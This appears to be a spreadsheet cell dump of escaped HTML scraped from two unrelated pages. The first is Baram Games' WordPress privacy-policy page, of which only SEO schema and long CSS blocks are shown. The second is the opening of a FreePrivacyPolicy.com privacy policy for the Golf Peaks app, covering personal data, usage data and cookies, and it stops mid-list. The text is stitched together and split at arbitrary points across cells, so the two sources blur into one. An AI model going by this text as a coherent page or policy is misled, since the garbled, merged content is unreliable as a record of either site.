&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://baramgames.com/privacy-policy/","url":"https://baramgames.com/privacy-policy/","name":"Privacy Policy - Baram Games","isPartOf":{"@id":"https://baramgames.com/#website"},"datePublished":"2021-02-19T15:36:58+00:00","dateModified":"2023-04-05T04:07:03+00:00","breadcrumb":{"@id":"https://baramgames.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://baramgames.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://baramgames.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://baramgames.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://baramgames.com/#website","url":"https://baramgames.com/","name":"Baram Games","description":"We create exceptional Educational Games for kids !</t>
  </si>
  <si>
    <t>","publisher":{"@id":"https://baramgames.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://baramgames.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://baramgames.com/#organization","name":"Baram Games","url":"https://baramgames.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://baramgames.com/#/schema/logo/image/","url":"","contentUrl":"","caption":"Baram Games"},"image":{"@id":"https://baramgames.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/BaramGames/","https://twitter.com/BaramGames","https://www.instagram.com/baramgames/","https://www.pinterest.com/BaramGames/","https://www.youtube.com/channel/UC2BXc9spbBpHhynGrb_bLrw"]}]}&lt;/script&gt;
&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.bunny.net' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Baram Games &amp;raquo; Feed" href="https://baramgames.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Baram Games &amp;raquo; Comments Feed" href="https://baramgames.com/comments/feed/" /&gt;
&lt;!-- &lt;link rel='stylesheet' id='blocksy-dynamic-global-css' href='https://baramgames.com/wp-content/uploads/blocksy/css/global.css?ver=74156' media='all' /&gt; --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel='stylesheet' id='wp-block-library-css' href='https://baramgames.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//baramgames.com/wp-content/cache/wpfc-minified/zyr1bqm/fxed6.css" media="all"/&gt;
&lt;style id='global-styles-inline-css'&gt;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#9b51e0;--wp--preset--color--palette-color-1: var(--paletteColor1, #2872fa);--wp--preset--color--palette-color-2: var(--paletteColor2, #1559ed);--wp--preset--color--palette-color-3: var(--paletteColor3, rgba(36,59,86,0.9));--wp--preset--color--palette-color-4: var(--paletteColor4, rgba(36,59,86,1));--wp--preset--color--palette-color-5: var(--paletteColor5, #ffffff);--wp--preset--color--palette-color-6: var(--paletteColor6, #f2f5f7);--wp--preset--color--palette-color-7: var(--paletteColor7, #FAFBFC);--wp--preset--color--palette-color-8: var(--paletteColor8, #ffffff);--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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100%);--wp--preset--gradient--juicy-peach: linear-gradient(to right, #ffecd2 0%, #fcb69f 100%);--wp--preset--gradient--young-passion: linear-gradient(to right, #ff8177 0%, #ff867a 0%, #ff8c7f 21%, #f99185 52%, #cf556c 78%, #b12a5b 100%);--wp--preset--gradient--true-sunset: linear-gradient(to right, #fa709a 0%, #fee140 100%);--wp--preset--gradient--morpheus-den: linear-gradient(to top, #30cfd0 0%, #330867 100%);--wp--preset--gradient--plum-plate: linear-gradient(135deg, #667eea 0%, #764ba2 100%);--wp--preset--gradient--aqua-splash: linear-gradient(15deg, #13547a 0%, #80d0c7 100%);--wp--preset--gradient--love-kiss: linear-gradient(to top, #ff0844 0%, #ffb199 100%);--wp--preset--gradient--new-retrowave: linear-gradient(to top, #3b41c5 0%, #a981bb 49%, #ffc8a9 100%);--wp--preset--gradient--plum-bath: linear-gradient(to top, #cc208e 0%, #6713d2 100%);--wp--preset--gradient--high-flight: linear-gradient(to right, #0acffe 0%, #495aff 100%);--wp--preset--gradient--teen-party: linear-gradient(-225deg, #FF057C 0%, #8D0B93 50%, #321575 100%);--wp--preset--gradient--fabled-sunset: linear-gradient(-225deg, #231557 0%, #44107A 29%, #FF1361 67%, #FFF800 100%);--wp--preset--gradient--arielle-smile: radial-gradient(circle 248px at center, #16d9e3 0%, #30c7ec 47%, #46aef7 100%);--wp--preset--gradient--itmeo-branding: linear-gradient(180deg, #2af598 0%, #009efd 100%);--wp--preset--gradient--deep-blue: linear-gradient(to right, #6a11cb 0%, #2575fc 100%);--wp--preset--gradient--strong-bliss: linear-gradient(to right, #f78ca0 0%, #f9748f 19%, #fd868c 60%, #fe9a8b 100%);--wp--preset--gradient--sweet-period: linear-gradient(to top, #3f51b1 0%, #5a55ae 13%, #7b5fac 25%, #8f6aae 38%, #a86aa4 50%, #cc6b8e 62%, #f18271 75%, #f3a469 87%, #f7c978 100%);--wp--preset--gradient--purple-division: linear-gradient(to top, #7028e4 0%, #e5b2ca 100%);--wp--preset--gradient--cold-evening: linear-gradient(to top, #0c3483 0%, #a2b6df 100%, #6b8cce 100%, #a2b6df 100%);--wp--preset--gradient--mountain-rock: linear-gradient(to right, #868f96 0%, #596164 100%);--wp--preset--gradient--desert-hump: linear-gradient(to top, #c79081 0%, #dfa579 100%);--wp--preset--gradient--ethernal-constance: linear-gradient(to top, #09203f 0%, #537895 100%);--wp--preset--gradient--happy-memories: linear-gradient(-60deg, #ff5858 0%, #f09819 100%);--wp--preset--gradient--grown-early: linear-gradient(to top, #0ba360 0%, #3cba92 100%);--wp--preset--gradient--morning-salad: linear-gradient(-225deg, #B7F8DB 0%, #50A7C2 100%);--wp--preset--gradient--night-call: linear-gradient(-225deg, #AC32E4 0%, #7918F2 48%, #4801FF 100%);--wp--preset--gradient--mind-crawl: linear-gradient(-225deg, #473B7B 0%, #3584A7 51%, #30D2BE 100%);--wp--preset--gradient--angel-care: linear-gradient(-225deg, #FFE29F 0%, #FFA99F 48%, #FF719A 100%);--wp--preset--gradient--juicy-cake: linear-gradient(to top, #e14fad 0%, #f9d423 100%);--wp--preset--gradient--rich-metal: linear-gradient(to right, #d7d2cc 0%, #304352 100%);--wp--preset--gradient--mole-hall: linear-gradient(-20deg, #616161 0%, #9bc5c3 100%);--wp--preset--gradient--cloudy-knoxville: linear-gradient(120deg, #fdfbfb 0%, #ebedee 100%);--wp--preset--gradient--soft-grass: linear-gradient(to top, #c1dfc4 0%, #deecdd 100%);--wp--preset--gradient--saint-petersburg: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);--wp--preset--gradient--everlasting-sky: linear-gradient(135deg, #fdfcfb 0%, #e2d1c3 100%);--wp--preset--gradient--kind-steel: linear-gradient(-20deg, #e9defa 0%, #fbfcdb 100%);--wp--preset--gradient--over-sun: linear-gradient(60deg, #abecd6 0%, #fbed96 100%);--wp--preset--gradient--premium-white: linear-gradient(to top, #d5d4d0 0%, #d5d4d0 1%, #eeeeec 31%, #efeeec 75%, #e9e9e7 100%);--wp--preset--gradient--clean-mirror: linear-gradient(45deg, #93a5cf 0%, #e4efe9 100%);--wp--preset--gradient--wild-apple: linear-gradient(to top, #d299c2 0%, #fef9d7 100%);--wp--preset--gradient--snow-again: linear-gradient(to top, #e6e9f0 0%, #eef1f5 100%);--wp--preset--gradient--confident-cloud: linear-gradient(to top, #dad4ec 0%, #dad4ec 1%, #f3e7e9 100%);--wp--preset--gradient--glass-water: linear-gradient(to top, #dfe9f3 0%, white 100%);--wp--preset--gradient--perfect-white: linear-gradient(-225deg, #E3FDF5 0%, #FFE6FA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t>
  </si>
  <si>
    <t>0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}body { margin: 0;--wp--style--global--content-size: var(--block-max-width);--wp--style--global--wide-size: var(--block-wide-max-width); }.wp-site-blocks &gt; .alignleft { float: left; margin-right: 2em; }.wp-site-blocks &gt; .alignright { float: right; margin-left: 2em; }.wp-site-blocks &gt; .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }.wp-site-blocks &gt; * { margin-block-start: 0; margin-block-end: 0; }.wp-site-blocks &gt; *</t>
  </si>
  <si>
    <t>+ * { margin-block-start: var(--content-spacing); }body { --wp--style--block-gap: var(--content-spacing); }body .is-layout-flow &gt; *{margin-block-start: 0;margin-block-end: 0;}body .is-layout-flow &gt; *</t>
  </si>
  <si>
    <t>+ *{margin-block-start: var(--content-spacing);margin-block-end: 0;}body .is-layout-constrained &gt; *{margin-block-start: 0;margin-block-end: 0;}body .is-layout-constrained &gt; * + *{margin-block-start: var(--content-spacing);margin-block-end: 0;}body .is-layout-flex{gap: var(--content-spacing);}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>*{margin: 0;}body{padding-top: 0px;padding-right: 0px;padding-bottom: 0px;padding-left: 0px;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-color{color: var(--wp--preset--color--white) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-1-color{color: var(--wp--preset--color--palette-color-1) ! important;}.has-palette-color-2-color{color: var(--wp--preset--color--palette-color-2) ! important;}.has-palette-color-3-color{color: var(--wp--preset--color--palette-color-3) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-4-color{color: var(--wp--preset--color--palette-color-4) ! important;}.has-palette-color-5-color{color: var(--wp--preset--color--palette-color-5) ! important;}.has-palette-color-6-color{color: var(--wp--preset--color--palette-color-6) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-7-color{color: var(--wp--preset--color--palette-color-7) ! important;}.has-palette-color-8-color{color: var(--wp--preset--color--palette-color-8) ! important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) ! important;}.has-palette-color-1-background-color{background-color: var(--wp--preset--color--palette-color-1) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-2-background-color{background-color: var(--wp--preset--color--palette-color-2) ! important;}.has-palette-color-3-background-color{background-color: var(--wp--preset--color--palette-color-3) ! important;}.has-palette-color-4-background-color{background-color: var(--wp--preset--color--palette-color-4) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-5-background-color{background-color: var(--wp--preset--color--palette-color-5) ! important;}.has-palette-color-6-background-color{background-color: var(--wp--preset--color--palette-color-6) ! important;}.has-palette-color-7-background-color{background-color: var(--wp--preset--color--palette-color-7) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-8-background-color{background-color: var(--wp--preset--color--palette-color-8) ! important;}.has-black-border-color{border-color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) ! important;}.has-palette-color-1-border-color{border-color: var(--wp--preset--color--palette-color-1) ! important;}.has-palette-color-2-border-color{border-color: var(--wp--preset--color--palette-color-2) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-3-border-color{border-color: var(--wp--preset--color--palette-color-3) ! important;}.has-palette-color-4-border-color{border-color: var(--wp--preset--color--palette-color-4) ! important;}.has-palette-color-5-border-color{border-color: var(--wp--preset--color--palette-color-5) !</t>
  </si>
  <si>
    <t>important;}.has-palette-color-6-border-color{border-color: var(--wp--preset--color--palette-color-6) ! important;}.has-palette-color-7-border-color{border-color: var(--wp--preset--color--palette-color-7) ! important;}.has-palette-color-8-border-color{border-color: var(--wp--preset--color--palette-color-8) !</t>
  </si>
  <si>
    <t>important;}.has-juicy-peach-gradient-background{background: var(--wp--preset--gradient--juicy-peach) ! important;}.has-young-passion-gradient-background{background: var(--wp--preset--gradient--young-passion) ! important;}.has-true-sunset-gradient-background{background: var(--wp--preset--gradient--true-sunset) !</t>
  </si>
  <si>
    <t>important;}.has-morpheus-den-gradient-background{background: var(--wp--preset--gradient--morpheus-den) ! important;}.has-plum-plate-gradient-background{background: var(--wp--preset--gradient--plum-plate) ! important;}.has-aqua-splash-gradient-background{background: var(--wp--preset--gradient--aqua-splash) !</t>
  </si>
  <si>
    <t>important;}.has-love-kiss-gradient-background{background: var(--wp--preset--gradient--love-kiss) ! important;}.has-new-retrowave-gradient-background{background: var(--wp--preset--gradient--new-retrowave) ! important;}.has-plum-bath-gradient-background{background: var(--wp--preset--gradient--plum-bath) !</t>
  </si>
  <si>
    <t>important;}.has-high-flight-gradient-background{background: var(--wp--preset--gradient--high-flight) ! important;}.has-teen-party-gradient-background{background: var(--wp--preset--gradient--teen-party) ! important;}.has-fabled-sunset-gradient-background{background: var(--wp--preset--gradient--fabled-sunset) !</t>
  </si>
  <si>
    <t>important;}.has-arielle-smile-gradient-background{background: var(--wp--preset--gradient--arielle-smile) ! important;}.has-itmeo-branding-gradient-background{background: var(--wp--preset--gradient--itmeo-branding) ! important;}.has-deep-blue-gradient-background{background: var(--wp--preset--gradient--deep-blue) !</t>
  </si>
  <si>
    <t>important;}.has-strong-bliss-gradient-background{background: var(--wp--preset--gradient--strong-bliss) ! important;}.has-sweet-period-gradient-background{background: var(--wp--preset--gradient--sweet-period) ! important;}.has-purple-division-gradient-background{background: var(--wp--preset--gradient--purple-division) !</t>
  </si>
  <si>
    <t>important;}.has-cold-evening-gradient-background{background: var(--wp--preset--gradient--cold-evening) ! important;}.has-mountain-rock-gradient-background{background: var(--wp--preset--gradient--mountain-rock) ! important;}.has-desert-hump-gradient-background{background: var(--wp--preset--gradient--desert-hump) !</t>
  </si>
  <si>
    <t>important;}.has-ethernal-constance-gradient-background{background: var(--wp--preset--gradient--ethernal-constance) ! important;}.has-happy-memories-gradient-background{background: var(--wp--preset--gradient--happy-memories) ! important;}.has-grown-early-gradient-background{background: var(--wp--preset--gradient--grown-early) !</t>
  </si>
  <si>
    <t>important;}.has-morning-salad-gradient-background{background: var(--wp--preset--gradient--morning-salad) ! important;}.has-night-call-gradient-background{background: var(--wp--preset--gradient--night-call) ! important;}.has-mind-crawl-gradient-background{background: var(--wp--preset--gradient--mind-crawl) !</t>
  </si>
  <si>
    <t>important;}.has-angel-care-gradient-background{background: var(--wp--preset--gradient--angel-care) ! important;}.has-juicy-cake-gradient-background{background: var(--wp--preset--gradient--juicy-cake) ! important;}.has-rich-metal-gradient-background{background: var(--wp--preset--gradient--rich-metal) !</t>
  </si>
  <si>
    <t>important;}.has-mole-hall-gradient-background{background: var(--wp--preset--gradient--mole-hall) ! important;}.has-cloudy-knoxville-gradient-background{background: var(--wp--preset--gradient--cloudy-knoxville) ! important;}.has-soft-grass-gradient-background{background: var(--wp--preset--gradient--soft-grass) !</t>
  </si>
  <si>
    <t>important;}.has-saint-petersburg-gradient-background{background: var(--wp--preset--gradient--saint-petersburg) ! important;}.has-everlasting-sky-gradient-background{background: var(--wp--preset--gradient--everlasting-sky) ! important;}.has-kind-steel-gradient-background{background: var(--wp--preset--gradient--kind-steel) !</t>
  </si>
  <si>
    <t>important;}.has-over-sun-gradient-background{background: var(--wp--preset--gradient--over-sun) ! important;}.has-premium-white-gradient-background{background: var(--wp--preset--gradient--premium-white) ! important;}.has-clean-mirror-gradient-background{background: var(--wp--preset--gradient--clean-mirror) !</t>
  </si>
  <si>
    <t>important;}.has-wild-apple-gradient-background{background: var(--wp--preset--gradient--wild-apple) ! important;}.has-snow-again-gradient-background{background: var(--wp--preset--gradient--snow-again) ! important;}.has-confident-cloud-gradient-background{background: var(--wp--preset--gradient--confident-cloud) !</t>
  </si>
  <si>
    <t>important;}.has-glass-water-gradient-background{background: var(--wp--preset--gradient--glass-water) ! important;}.has-perfect-white-gradient-background{background: var(--wp--preset--gradient--perfect-white) ! important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !</t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;!-- &lt;link rel='stylesheet' id='ct-main-styles-css' href='https://baramgames.com/wp-content/themes/blocksy/static/bundle/main.min.css?ver=1.8.82' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='blocksy-ext-widgets-styles-css' href='https://baramgames.com/wp-content/plugins/blocksy-companion/framework/extensions/widgets/static/bundle/main.min.css?ver=1.8.82' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//baramgames.com/wp-content/cache/wpfc-minified/epwdqyh4/fxed6.css" media="all"/&gt;
&lt;link rel='stylesheet' id='blocksy-fonts-font-source-google-css' href='https://fonts.googleapis.com/css2?family=Nunito:wght@500;600;700&amp;#038;display=swap' media='all' /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel='stylesheet' id='ct-page-title-styles-css' href='https://baramgames.com/wp-content/themes/blocksy/static/bundle/page-title.min.css?ver=1.8.82' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='ct-brizy-styles-css' href='https://baramgames.com/wp-content/themes/blocksy/static/bundle/brizy.min.css?ver=1.8.82' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//baramgames.com/wp-content/cache/wpfc-minified/d3ubmd6j/fxed6.css" media="all"/&gt;
&lt;link rel='stylesheet' id='brizy-asset-google-10-css'  class="brz-link brz-link-google" type="text/css" href='https://fonts.bunny.net/ css?family=Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic%7CPalanquin%3A100%2C200%2C300%2Cregular%2C500%2C600%2C700%7CPalanquin+Dark%3Aregular%2C500%2C600%2C700%7CNunito%3A200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;#038;subset=arabic%2Cbengali%2Ccyrillic%2Ccyrillic-ext%2Cdevanagari%2Cgreek%2Cgreek-ext%2Cgujarati%2Chebrew%2Ckhmer%2Ckorean%2Clatin-ext%2Ctamil%2Ctelugu%2Cthai%2Cvietnamese&amp;#038;display=swap&amp;#038;ver=2.4.18' media='all' /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel='stylesheet' id='brizy-asset-group-1_3-20-css'  class="brz-link brz-link-preview-lib" data-group="group-1_3" href='https://baramgames.com/wp-content/plugins/brizy/public/editor-build/255-wp/editor/css/group-1_3.css?ver=2.4.18' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='brizy-asset-group-2-21-css'  class="brz-link brz-link-preview-lib-pro" data-group="group-2" href='https://baramgames.com/wp-content/plugins/brizy-pro/public/editor-build/129-wp/css/group-2-pro.css?ver=2.4.17' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='brizy-asset-main-30-css'  class="brz-link brz-link-preview-pro" href='https://baramgames.com/wp-content/plugins/brizy-pro/public/editor-build/129-wp/css/preview.pro.css?ver=2.4.17' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//baramgames.com/wp-content/cache/wpfc-minified/86q0jmfq/fxee9.css" media="all"/&gt;
&lt;style id='brizy-asset-main-30-inline-css'&gt;
.brz</t>
  </si>
  <si>
    <t>.brz-cp-color1, .brz .brz-bcp-color1{color: rgb(var(--brz-global-color1));}.brz .brz-cp-color2, .brz .brz-bcp-color2{color: rgb(var(--brz-global-color2));}.brz .brz-cp-color3,</t>
  </si>
  <si>
    <t>.brz .brz-bcp-color3{color: rgb(var(--brz-global-color3));}.brz .brz-cp-color4, .brz .brz-bcp-color4{color: rgb(var(--brz-global-color4));}.brz .brz-cp-color5,</t>
  </si>
  <si>
    <t>.brz .brz-bcp-color5{color: rgb(var(--brz-global-color5));}.brz .brz-cp-color6, .brz .brz-bcp-color6{color: rgb(var(--brz-global-color6));}.brz .brz-cp-color7, .brz .brz-bcp-color7{color: rgb(var(--brz-global-color7));}.brz .brz-cp-color8, .brz</t>
  </si>
  <si>
    <t>.brz-bcp-color8{color: rgb(var(--brz-global-color8));}:root{--brz-global-color1:237, 217, 46;--brz-global-color2:5, 5, 5;--brz-global-color3:59, 121, 228;--brz-global-color4:255, 255, 255;--brz-global-color5:158, 71, 218;--brz-global-color6:234, 246, 227;--brz-global-color7:111, 109, 112;--brz-global-color8:255, 255, 255;}:root{--brz-paragraphfontfamily:Palanquin, sans-serif;--brz-paragraphfontsize:17px;--brz-paragraphfontsizesuffix:undefined;--brz-paragraphfontweight:400;--brz-paragraphletterspacing:0px;--brz-paragraphlineheight:1.9;--brz-paragraphtabletfontsize:16px;--brz-paragraphtabletfontweight:400;--brz-paragraphtabletletterspacing:0px;--brz-paragraphtabletlineheight:1.6;--brz-paragraphmobilefontsize:16px;--brz-paragraphmobilefontweight:400;--brz-paragraphmobileletterspacing:0px;--brz-paragraphmobilelineheight:1.6;--brz-paragraphstoryfontsize:3.91%;--brz-subtitlefontfamily:Palanquin, sans-serif;--brz-subtitlefontsize:17px;--brz-subtitlefontsizesuffix:undefined;--brz-subtitlefontweight:400;--brz-subtitleletterspacing:0px;--brz-subtitlelineheight:1.8;--brz-subtitletabletfontsize:17px;--brz-subtitletabletfontweight:300;--brz-subtitletabletletterspacing:0px;--brz-subtitletabletlineheight:1.5;--brz-subtitlemobilefontsize:17px;--brz-subtitlemobilefontweight:300;--brz-subtitlemobileletterspacing:0px;--brz-subtitlemobilelineheight:1.5;--brz-subtitlestoryfontsize:3.91%;--brz-abovetitlefontfamily:Palanquin, sans-serif;--brz-abovetitlefontsize:13px;--brz-abovetitlefontsizesuffix:undefined;--brz-abovetitlefontweight:700;--brz-abovetitleletterspacing:1.1px;--brz-abovetitlelineheight:1.5;--brz-abovetitletabletfontsize:13px;--brz-abovetitletabletfontweight:600;--brz-abovetitletabletletterspacing:1px;--brz-abovetitletabletlineheight:1.5;--brz-abovetitlemobilefontsize:13px;--brz-abovetitlemobilefontweight:600;--brz-abovetitlemobileletterspacing:1px;--brz-abovetitlemobilelineheight:1.5;--brz-abovetitlestoryfontsize:2.99%;--brz-heading1fontfamily:Palanquin Dark, sans-serif;--brz-heading1fontsize:46px;--brz-heading1fontsizesuffix:undefined;--brz-heading1fontweight:400;--brz-heading1letterspacing:-1.5px;--brz-heading1lineheight:1.3;--brz</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;title&gt;Privacy Policy for Golf Peaks - FreePrivacyPolicy.com&lt;/title&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="stylesheet" type="text/css" href="/public/livelink/css/livelink.css" /&gt;
&lt;meta name="robots" content="noindex" /&gt;
&lt;meta property="og:title" content="Privacy Policy for Golf Peaks - FreePrivacyPolicy.com" /&gt;
&lt;meta property="og:image" content="https://www.freeprivacypolicy.com/public/images/meta_og_image_livelink.png" /&gt;
&lt;meta property="og:image:width" content="1280" /&gt;
&lt;meta property="og:image:height" content="720" /&gt;
&lt;meta property="og:url" content="https://www.freeprivacypolicy.com/live/626f6d8792773d5366451098351a5e4c" /&gt;
&lt;meta property="og:site_name" content="FreePrivacyPolicy.com" /&gt;
&lt;link rel="canonical" href="https://www.freeprivacypolicy.com/live/626f6d8792773d5366451098351a5e4c" /&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-QSMNQ8CKJG"&gt;&lt;/script&gt;
&lt;script&gt;
     window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'G-QSMNQ8CKJG');
    &lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="page"&gt;
&lt;div class="header"&gt;
&lt;div class="container"&gt;
&lt;p class="title"&gt;Privacy Policy for Golf Peaks&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="translations-list-container"&gt;
&lt;div class="container"&gt;
&lt;ul class="translations-list"&gt;
&lt;li class="en translations-list-item"&gt;
&lt;a class="tab-link active" href="#en"&gt;English&lt;/a&gt;
&lt;/li&gt;
&lt;li class="de translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#de"&gt;German&lt;/a&gt;
&lt;/li&gt;
&lt;li class="it translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#it"&gt;Italian&lt;/a&gt;
&lt;/li&gt;
&lt;li class="fr translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#fr"&gt;French&lt;/a&gt;
&lt;/li&gt;
&lt;li class="nl translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#nl"&gt;Dutch&lt;/a&gt;
&lt;/li&gt;
&lt;li class="es translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#es"&gt;Spanish&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="translations-content-container"&gt;
&lt;div class="container"&gt;
&lt;div class="tab-content translations-content-item en visible" id="en"&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;Effective date: October 15, 2018&lt;/p&gt;
&lt;p&gt;Afterburn Łukasz Spierewka (&amp;quot;us&amp;quot;, &amp;quot;we&amp;quot;, or &amp;quot;our&amp;quot;) operates the Golf Peaks mobile application (hereinafter referred to as the &amp;quot;Service&amp;quot;).&lt;/p&gt;
&lt;p&gt; This page informs you of our policies regarding the collection, use and disclosure of personal data when you use our Service and the choices you have associated with that data. This Privacy Policy is managed by &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use your data to provide and improve the Service. By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy Policy, the terms used in this Privacy Policy have the same meanings as in our Terms and Conditions.&lt;/p&gt;
&lt;h2&gt;Definitions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Service&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Service is the Golf Peaks mobile application operated by Afterburn Łukasz Spierewka&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Personal Data&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Personal Data means data about a living individual who can be identified from those data (or from those and other information either in our possession or likely to come into our possession).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Usage Data&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Usage Data is data collected automatically either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cookies are small files stored on your device (computer or mobile device).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Information Collection and Use&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We collect several different types of information for various purposes to provide and improve our Service to you.&lt;/p&gt;
&lt;h3&gt;Types of Data Collected&lt;/h3&gt;
&lt;h4&gt;Personal Data&lt;/h4&gt;
&lt;p&gt;While using our Service, we may ask you to provide us with certain personally identifiable information that can be used to contact or identify you (&amp;quot;Personal Data&amp;quot;). Personally identifiable information may include, but is not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookies and Usage Data&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Usage Data&lt;/h4&gt;
&lt;p&gt;When you access the Service with a mobile device, we may collect certain information automatically, including, but not limited to, the type of mobile device you use, your mobile device unique ID, the IP address of your mobile device, your mobile operating system, the type of mobile Internet browser you use, unique device identifiers and other diagnostic data (&amp;quot;Usage Data&amp;quot;).&lt;/p&gt;
 &lt;h4&gt;Tracking &amp;amp; Cookies Data&lt;/h4&gt;
&lt;p&gt;We use cookies and similar tracking technologies to track the activity on our Service and we hold certain information.
</t>
  </si>
  <si>
    <t xml:space="preserve">Cookies are files with a small amount of data which may include an anonymous unique identifier. Cookies are sent to your browser from a website and stored on your device. Other tracking technologies are also used such as beacons, tags and scripts to collect and track information and to improve and analyse our Service.
</t>
  </si>
  <si>
    <t>You can instruct your browser to refuse all cookies or to indicate when a cookie is being sent. However, if you do not accept cookies, you may not be able to use some portions of our Service.
 Examples of Cookies we use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Session Cookies.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>We use Session Cookies to operate our Service.&lt;/li&gt;
